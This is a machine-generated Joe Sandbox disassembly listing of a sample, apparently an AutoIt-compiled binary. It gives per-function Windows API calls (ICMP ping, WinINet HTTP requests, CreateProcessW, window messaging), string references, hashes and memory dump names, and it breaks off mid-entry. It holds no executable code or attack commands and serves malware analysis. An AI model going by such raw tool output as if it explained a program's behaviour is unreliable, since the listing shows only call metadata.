API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
String ID: Ping
API String ID: 1028309954-2246546115
Opcode ID: 43af2836d9434021c4b2504687a6eb47183cc44755e8aeba30661be658bbd547
Instruction ID: ecf7dd4f9c8586bda82cbd88f77d100a4182f02c2de39bda1cb993927837796c
Opcode Fuzzy Hash: 43af2836d9434021c4b2504687a6eb47183cc44755e8aeba30661be658bbd547
Instruction Fuzzy Hash: 14515F316047119FD720EF25DC49B6A7BE6EF88720F04452AF956DB3A2DB70E901DB42

Function 0063B4C3 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 98COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 0063B4D0
GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 0063B546
GetLastError.KERNEL32 ref: 0063B550
SetErrorMode.KERNEL32(00000000,READY), ref: 0063B5BD

Strings

NOTREADY, xrefs: 0063B57C
INVALID, xrefs: 0063B58F
UNKNOWN, xrefs: 0063B575
READONLY, xrefs: 0063B588
READY, xrefs: 0063B596

Memory Dump Source

Source File: 00000000.00000002.1446202466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true

Associated: 00000000.00000002.1446142615.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.000000000065F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446483787.000000000068E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447339878.0000000000697000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5d0000_M7XS5C07kV.jbxd

Similarity

API ID: Error$Mode$DiskFreeLastSpace
String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
API String ID: 4194297153-14809454
Opcode ID: 4c5b94f4b25b4f418ed8e4757eb56cbcca4b0be76717898ded183e0693c09567
Instruction ID: 1b60e337e301c6124d54a08f3cdad7217ddba666d7ed1fe297b12e191b9ffadc
Opcode Fuzzy Hash: 4c5b94f4b25b4f418ed8e4757eb56cbcca4b0be76717898ded183e0693c09567
Instruction Fuzzy Hash: BA318375A00209EFCB10EF68C849AAD7BB6FF48321F504166E605D7391DB719A42CB91

Function 00628F8F Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 82windowCOMMON

Download Yara Rule

APIs

Part of subcall function 005D7DE1: _memmove.LIBCMT ref: 005D7E22

Part of subcall function 0062AA99: GetClassNameW.USER32(?,?,000000FF), ref: 0062AABC

SendMessageW.USER32(?,0000018C,000000FF,00000002), ref: 00629014
GetDlgCtrlID.USER32 ref: 0062901F
GetParent.USER32 ref: 0062903B
SendMessageW.USER32(00000000,?,00000111,?), ref: 0062903E
GetDlgCtrlID.USER32(?), ref: 00629047
GetParent.USER32(?), ref: 00629063
SendMessageW.USER32(00000000,?,?,00000111), ref: 00629066

Strings

ListBox, xrefs: 00628FD1
ComboBox, xrefs: 00628F9C

Memory Dump Source

Source File: 00000000.00000002.1446202466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true

Associated: 00000000.00000002.1446142615.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.000000000065F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446483787.000000000068E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447339878.0000000000697000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5d0000_M7XS5C07kV.jbxd

Similarity

API ID: MessageSend$CtrlParent$ClassName_memmove
String ID: ComboBox$ListBox
API String ID: 1536045017-1403004172
Opcode ID: 4d705ddf3cfa28bf834c18830b8f1cbf39c91d09355127ac0c055eb82ab1b537
Instruction ID: 0b6ff19e8e34658f747af63636eff5a47c92f979dd1649bc12dd5c6d2b530f69
Opcode Fuzzy Hash: 4d705ddf3cfa28bf834c18830b8f1cbf39c91d09355127ac0c055eb82ab1b537
Instruction Fuzzy Hash: EF21D670A00209BBDF14EBA4DC89EFEBBB6EF89310F10411AB961972A1DB755815DF20

Function 0062907A Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 81windowCOMMON

Download Yara Rule

APIs

Part of subcall function 005D7DE1: _memmove.LIBCMT ref: 005D7E22

Part of subcall function 0062AA99: GetClassNameW.USER32(?,?,000000FF), ref: 0062AABC

SendMessageW.USER32(?,00000186,00000002,00000000), ref: 006290FD
GetDlgCtrlID.USER32 ref: 00629108
GetParent.USER32 ref: 00629124
SendMessageW.USER32(00000000,?,00000111,?), ref: 00629127
GetDlgCtrlID.USER32(?), ref: 00629130
GetParent.USER32(?), ref: 0062914C
SendMessageW.USER32(00000000,?,?,00000111), ref: 0062914F

Strings

ListBox, xrefs: 006290BC
ComboBox, xrefs: 00629087

Memory Dump Source

Source File: 00000000.00000002.1446202466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true

Associated: 00000000.00000002.1446142615.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.000000000065F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446483787.000000000068E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447339878.0000000000697000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5d0000_M7XS5C07kV.jbxd

Similarity

API ID: MessageSend$CtrlParent$ClassName_memmove
String ID: ComboBox$ListBox
API String ID: 1536045017-1403004172
Opcode ID: bff7cee4a6344159975108e362f84e206f847ea91ad10e968a33a4553eac98fd
Instruction ID: ec080efe7c2953a9045d99593019f0a4a7c83d4485ff482b0f42442efe670a7e
Opcode Fuzzy Hash: bff7cee4a6344159975108e362f84e206f847ea91ad10e968a33a4553eac98fd
Instruction Fuzzy Hash: B821F874A00209BBDF10EBA4DC89EFEBBB6FF89300F10401AB551972A1DB754415DF20

Function 00629163 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 72windowCOMMON

Download Yara Rule

APIs

GetParent.USER32 ref: 0062916F
GetClassNameW.USER32(00000000,?,00000100), ref: 00629184
_wcscmp.LIBCMT ref: 00629196
SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 00629211

Strings

list, xrefs: 006291F3
details, xrefs: 006291BF
SHELLDLL_DefView, xrefs: 00629190
smallicons, xrefs: 006291D9
largeicons, xrefs: 006291A5

Memory Dump Source

Source File: 00000000.00000002.1446202466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true

Associated: 00000000.00000002.1446142615.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.000000000065F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446483787.000000000068E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447339878.0000000000697000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5d0000_M7XS5C07kV.jbxd

Similarity

API ID: ClassMessageNameParentSend_wcscmp
String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
API String ID: 1704125052-3381328864
Opcode ID: 53a68f95c6f0f11ac14c1e43936147e206f77cf847baf0594c716dedd4c3896b
Instruction ID: f705e2039f1b5b975f7f91dd5a5a1eca8c07228ee0a6f09cf644280c53b12553
Opcode Fuzzy Hash: 53a68f95c6f0f11ac14c1e43936147e206f77cf847baf0594c716dedd4c3896b
Instruction Fuzzy Hash: EC113A7624C717B9FB103624FC1EDF73B9EAB95320F300126FA10A01D2FE6299115EA0

Function 00637990 Relevance: 15.3, APIs: 10, Instructions: 292COMMON

Download Yara Rule

APIs

SafeArrayGetVartype.OLEAUT32(00000000,?), ref: 00637A6C

Memory Dump Source

Source File: 00000000.00000002.1446202466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true

Associated: 00000000.00000002.1446142615.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.000000000065F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446483787.000000000068E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447339878.0000000000697000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5d0000_M7XS5C07kV.jbxd

Similarity

API ID: ArraySafeVartype
String ID:
API String ID: 1725837607-0
Opcode ID: 395f59ffea1a602c9b8f43d3bf3cd704d4286d05a85f446afca28b6f013f8e1d
Instruction ID: 0253d64912cd903797a92aa121b532df745bd11c2441655bc01b68bb680ecd9e
Opcode Fuzzy Hash: 395f59ffea1a602c9b8f43d3bf3cd704d4286d05a85f446afca28b6f013f8e1d
Instruction Fuzzy Hash: 56B16CB190421A9FDB20DFA4C885BBEB7F6FF49321F245429EA01E7291D734A941CBD0

Function 006311CE Relevance: 15.1, APIs: 10, Instructions: 89threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 006311F0
GetForegroundWindow.USER32(00000000,?,?,?,?,?,00630268,?,00000001), ref: 00631204
GetWindowThreadProcessId.USER32(00000000), ref: 0063120B
AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00630268,?,00000001), ref: 0063121A
GetWindowThreadProcessId.USER32(?,00000000), ref: 0063122C
AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00630268,?,00000001), ref: 00631245
AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00630268,?,00000001), ref: 00631257
AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,00630268,?,00000001), ref: 0063129C
AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,00630268,?,00000001), ref: 006312B1
AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,00630268,?,00000001), ref: 006312BC

Memory Dump Source

Source File: 00000000.00000002.1446202466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true

Associated: 00000000.00000002.1446142615.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.000000000065F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446483787.000000000068E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447339878.0000000000697000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5d0000_M7XS5C07kV.jbxd

Similarity

API ID: Thread$AttachInput$Window$Process$CurrentForeground
String ID:
API String ID: 2156557900-0
Opcode ID: 404f0b760f55542519971348d44c575e2a97c4d42332507f06d8f9003e94dcc1
Instruction ID: 9cf0a2f4e667129726bf27bf6e95b4f607c3c8da9d12e19a8ba347b75432df14
Opcode Fuzzy Hash: 404f0b760f55542519971348d44c575e2a97c4d42332507f06d8f9003e94dcc1
Instruction Fuzzy Hash: CC317175600304BBDB10DF54EC48FAA77AFEB56312F109116F905DB6A0D7B49E808BA0

Function 005DFA5D Relevance: 14.3, APIs: 7, Strings: 1, Instructions: 264comCOMMON

Download Yara Rule

APIs

mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 005DFAA6
OleUninitialize.OLE32(?,00000000), ref: 005DFB45
UnregisterHotKey.USER32(?), ref: 005DFC9C
DestroyWindow.USER32(?), ref: 006145D6
FreeLibrary.KERNEL32(?), ref: 0061463B
VirtualFree.KERNEL32(?,00000000,00008000), ref: 00614668

Strings

close all, xrefs: 005DFAA1

Memory Dump Source

Source File: 00000000.00000002.1446202466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true

Associated: 00000000.00000002.1446142615.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.000000000065F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446483787.000000000068E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447339878.0000000000697000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5d0000_M7XS5C07kV.jbxd

Similarity

API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
String ID: close all
API String ID: 469580280-3243417748
Opcode ID: b4cb234a978a65899e21875aeb6a6567de95ce92149a7bdd6aedea59114635e6
Instruction ID: d79561a8df2a9320902e05b976931590b69e2a06733213c169390b72d2906e72
Opcode Fuzzy Hash: b4cb234a978a65899e21875aeb6a6567de95ce92149a7bdd6aedea59114635e6
Instruction Fuzzy Hash: C1A18330701212CFDB29EF18C599AA9FB65BF45714F1441AEE80AAB361DF30AD56CF90

Function 00649113 Relevance: 14.3, APIs: 5, Strings: 3, Instructions: 263COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00649167
VariantInit.OLEAUT32(?), ref: 00649238
VariantInit.OLEAUT32(?), ref: 00649339
VariantClear.OLEAUT32(?), ref: 00649343
VariantClear.OLEAUT32(?), ref: 006493A0

Strings

Null Object assignment in FOR..IN loop, xrefs: 006491C8, 006492F6, 006493AE
,,f, xrefs: 006491E5
Incorrect Object type in FOR..IN loop, xrefs: 0064931C

Memory Dump Source

Source File: 00000000.00000002.1446202466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true

Associated: 00000000.00000002.1446142615.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.000000000065F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446483787.000000000068E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447339878.0000000000697000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5d0000_M7XS5C07kV.jbxd

Similarity

API ID: Variant$ClearInit$_memset
String ID: ,,f$Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
API String ID: 2862541840-264730138
Opcode ID: 8d20ea3ac2d965042555737720c4d4f40ff626211c2001f40bc82c931abe91f6
Instruction ID: b6a72bb5a15281d387c21e81f4f902183e3f9466d6ba290e664bb3b15430029f
Opcode Fuzzy Hash: 8d20ea3ac2d965042555737720c4d4f40ff626211c2001f40bc82c931abe91f6
Instruction Fuzzy Hash: 8A91AD71A40219EBDF25DFA5C848FEFBBBAEF86710F108159F515AB281D7709901CBA0

Function 0062A068 Relevance: 14.2, APIs: 2, Strings: 6, Instructions: 241COMMON

Download Yara Rule

APIs

EnumChildWindows.USER32(?,0062A439), ref: 0062A377

Strings

INSTANCE, xrefs: 0062A285
TEXT, xrefs: 0062A2AE
REGEXPCLASS, xrefs: 0062A13C
CLASSNN, xrefs: 0062A119
CLASS, xrefs: 0062A0F6
NAME, xrefs: 0062A1A9

Memory Dump Source

Source File: 00000000.00000002.1446202466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true

Associated: 00000000.00000002.1446142615.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.000000000065F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446483787.000000000068E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447339878.0000000000697000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5d0000_M7XS5C07kV.jbxd

Similarity

API ID: ChildEnumWindows
String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
API String ID: 3555792229-1603158881
Opcode ID: ba5825cd926bbbf27441d1bb32faa8bf733a2eaf9af3bb86f69c9435cf44ab72
Instruction ID: 81725f1a92f3fa930e75126e7d8c718c86e31cf0244546772a8cefea3db40135
Opcode Fuzzy Hash: ba5825cd926bbbf27441d1bb32faa8bf733a2eaf9af3bb86f69c9435cf44ab72
Instruction Fuzzy Hash: E691D631500A1AEBCB08EFE4D445BEDFF76BF44300F54811AD959A7281DB70AA99CF91

Function 0065B351 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 199windowCOMMON

Download Yara Rule

APIs

IsWindow.USER32(00EB5B50), ref: 0065B3EB
IsWindowEnabled.USER32(00EB5B50), ref: 0065B3F7
SendMessageW.USER32(?,0000041C,00000000,00000000), ref: 0065B4DB
SendMessageW.USER32(00EB5B50,000000B0,?,?), ref: 0065B512
IsDlgButtonChecked.USER32(?,?), ref: 0065B54F
GetWindowLongW.USER32(00EB5B50,000000EC), ref: 0065B571
SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 0065B589

Strings

P[, xrefs: 0065B38A, 0065B401, 0065B4BC

Memory Dump Source

Source File: 00000000.00000002.1446202466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true

Associated: 00000000.00000002.1446142615.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.000000000065F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446483787.000000000068E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447339878.0000000000697000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5d0000_M7XS5C07kV.jbxd

Similarity

API ID: MessageSendWindow$ButtonCheckedEnabledLong
String ID: P[
API String ID: 4072528602-2517523118
Opcode ID: e326126bb76d19a72502f5567168ec4ab507ae914dce12baa16d8c9d072fdadb
Instruction ID: ee0ca9ddbec704f73b2b775f2d367ec4c246b6cc1f8ae8df910b1a7d63be7a7f
Opcode Fuzzy Hash: e326126bb76d19a72502f5567168ec4ab507ae914dce12baa16d8c9d072fdadb
Instruction Fuzzy Hash: CF716634604604AFDF359F64C894BEABBAAEF09302F146069ED46973A6C731A949CB50

Function 005D2E26 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 186windowCOMMON

Download Yara Rule

APIs

SetWindowLongW.USER32(?,000000EB), ref: 005D2EAE

Part of subcall function 005D1DB3: GetClientRect.USER32(?,?), ref: 005D1DDC
Part of subcall function 005D1DB3: GetWindowRect.USER32(?,?), ref: 005D1E1D
Part of subcall function 005D1DB3: ScreenToClient.USER32(?,?), ref: 005D1E45

GetDC.USER32 ref: 0060CD32
SendMessageW.USER32(?,00000031,00000000,00000000), ref: 0060CD45
SelectObject.GDI32(00000000,00000000), ref: 0060CD53
SelectObject.GDI32(00000000,00000000), ref: 0060CD68
ReleaseDC.USER32(?,00000000), ref: 0060CD70
MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 0060CDFB

Strings

U, xrefs: 0060CCD0

Memory Dump Source

Source File: 00000000.00000002.1446202466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true

Associated: 00000000.00000002.1446142615.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.000000000065F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446483787.000000000068E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447339878.0000000000697000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5d0000_M7XS5C07kV.jbxd

Similarity

API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
String ID: U
API String ID: 4009187628-3372436214
Opcode ID: eb6f97523b05c671117a5d4b6c6bf02924cfdb1d35d1afc1562c663b6430aa9a
Instruction ID: 33c502181c302b0a0ca8bb2c313bb5ab87ca93df0d5cb8ad4eddd6e33470a312
Opcode Fuzzy Hash: eb6f97523b05c671117a5d4b6c6bf02924cfdb1d35d1afc1562c663b6430aa9a
Instruction Fuzzy Hash: BB718B31500205EFCF299F68C884AEA7FBAFF58321F14466BED559A3E6D7318841DB60

Function 00641A15 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 134networkCOMMON

Download Yara Rule

APIs

InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00641A50
HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 00641A7C
InternetQueryOptionW.WININET(00000000,0000001F,00000000,?), ref: 00641ABE
InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 00641AD3
HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00641AE0
HttpQueryInfoW.WININET(00000000,00000005,?,?,00000000), ref: 00641B10
InternetCloseHandle.WININET(00000000), ref: 00641B57

Part of subcall function 00642483: GetLastError.KERNEL32(?,?,00641817,00000000,00000000,00000001), ref: 00642498
Part of subcall function 00642483: SetEvent.KERNEL32(?,?,00641817,00000000,00000000,00000001), ref: 006424AD

Strings

, xrefs: 00641B01

Memory Dump Source

Source File: 00000000.00000002.1446202466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true

Associated: 00000000.00000002.1446142615.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.000000000065F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446483787.000000000068E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447339878.0000000000697000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5d0000_M7XS5C07kV.jbxd

Similarity

API ID: Internet$Http$OptionQueryRequest$CloseConnectErrorEventHandleInfoLastOpenSend
String ID:
API String ID: 2603140658-3916222277
Opcode ID: 4f205ce1047e7219f3adf787b160f1f500e27326415454c88a670810014d8b41
Instruction ID: 1216b3c1d38c9d9040c8070e13e311be12e9849e010a4b8139b2e979b1078fed
Opcode Fuzzy Hash: 4f205ce1047e7219f3adf787b160f1f500e27326415454c88a670810014d8b41
Instruction Fuzzy Hash: B04192B1501219BFEB11DF50CC89FFB7BAEEF09354F00412AF9059A241E7709E858BA4

Function 006562CD Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 99windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 006562EC
GetWindowLongW.USER32(00EB5B50,000000F0), ref: 0065631F
GetWindowLongW.USER32(00EB5B50,000000F0), ref: 00656354
SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 00656386
SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 006563B0
GetWindowLongW.USER32(00000000,000000F0), ref: 006563C1
SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 006563DB

Strings

P[, xrefs: 006562D0, 00656304, 00656339, 00656371, 00656395, 006563CD

Memory Dump Source

Source File: 00000000.00000002.1446202466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true

Associated: 00000000.00000002.1446142615.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.000000000065F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446483787.000000000068E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447339878.0000000000697000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5d0000_M7XS5C07kV.jbxd

Similarity

API ID: LongWindow$MessageSend
String ID: P[
API String ID: 2178440468-2517523118
Opcode ID: 08f6fff7e5ce358ca667e581eb5cd16ec753880162fa7f1ee57e99f1b66d1ed3
Instruction ID: 42d7177208bf025b8747f897da7b2704fde71feb051bca33a52047c58f97a081
Opcode Fuzzy Hash: 08f6fff7e5ce358ca667e581eb5cd16ec753880162fa7f1ee57e99f1b66d1ed3
Instruction Fuzzy Hash: 2E311130644250AFDB21CF18DC84F9937E6FB4A756F6921A9F9018F2B2CB71AC49DB50

Function 00648C46 Relevance: 13.9, APIs: 9, Instructions: 438COMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(?,?,00000104,?,0065F910), ref: 00648D28
FreeLibrary.KERNEL32(00000000,00000001,00000000,?,0065F910), ref: 00648D5C
QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 00648ED6
SysFreeString.OLEAUT32(?), ref: 00648F00

Memory Dump Source

Source File: 00000000.00000002.1446202466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true

Associated: 00000000.00000002.1446142615.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.000000000065F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446483787.000000000068E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447339878.0000000000697000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5d0000_M7XS5C07kV.jbxd

Similarity

API ID: Free$FileLibraryModuleNamePathQueryStringType
String ID:
API String ID: 560350794-0
Opcode ID: 446d3db35444f479b6f0df5f9ef0d6198bd435ba7c31adcc27f2433e64ab24a3
Instruction ID: 80c275417fb07e3039aa6e8dd800c884e57927af1c9999fd36daf75a3d596e78
Opcode Fuzzy Hash: 446d3db35444f479b6f0df5f9ef0d6198bd435ba7c31adcc27f2433e64ab24a3
Instruction Fuzzy Hash: E0F10871A00209EFDB14DF94C884EEEB7BAFF45715F108499F905AB251DB31AE46CB60

Function 0064F694 Relevance: 13.9, APIs: 9, Instructions: 386processCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 0064F6B5
GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 0064F848
GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 0064F86C
GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 0064F8AC
GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 0064F8CE
CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 0064FA4A
GetLastError.KERNEL32(00000000,00000001,00000000), ref: 0064FA7C
CloseHandle.KERNEL32(?), ref: 0064FAAB
CloseHandle.KERNEL32(?), ref: 0064FB22

Memory Dump Source

Source File: 00000000.00000002.1446202466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true

Associated: 00000000.00000002.1446142615.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.000000000065F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446483787.000000000068E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447339878.0000000000697000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5d0000_M7XS5C07kV.jbxd

Similarity

API ID: Directory$CloseCurrentHandleSystem$CreateErrorLastProcess_memset
String ID:
API String ID: 4090791747-0
Opcode ID: 4de7ce94dc924f70cd779fe00c20f7081af47ee65590ab3d2a18eb11227990c7
Instruction ID: b178ff98474e54005092a40e60f0e0911fa30d11f9a35ebfa2d1dab2eb9697ab
Opcode Fuzzy Hash: 4de7ce94dc924f70cd779fe00c20f7081af47ee65590ab3d2a18eb11227990c7
Instruction Fuzzy Hash: 04E19E316043419FD724EF24D885B6ABBE2BF85314F14856EF8999B3A2CB31EC45CB52

Function 00634CC1 Relevance: 13.7, APIs: 9, Instructions: 170filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 0063466E: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00633697,?), ref: 0063468B

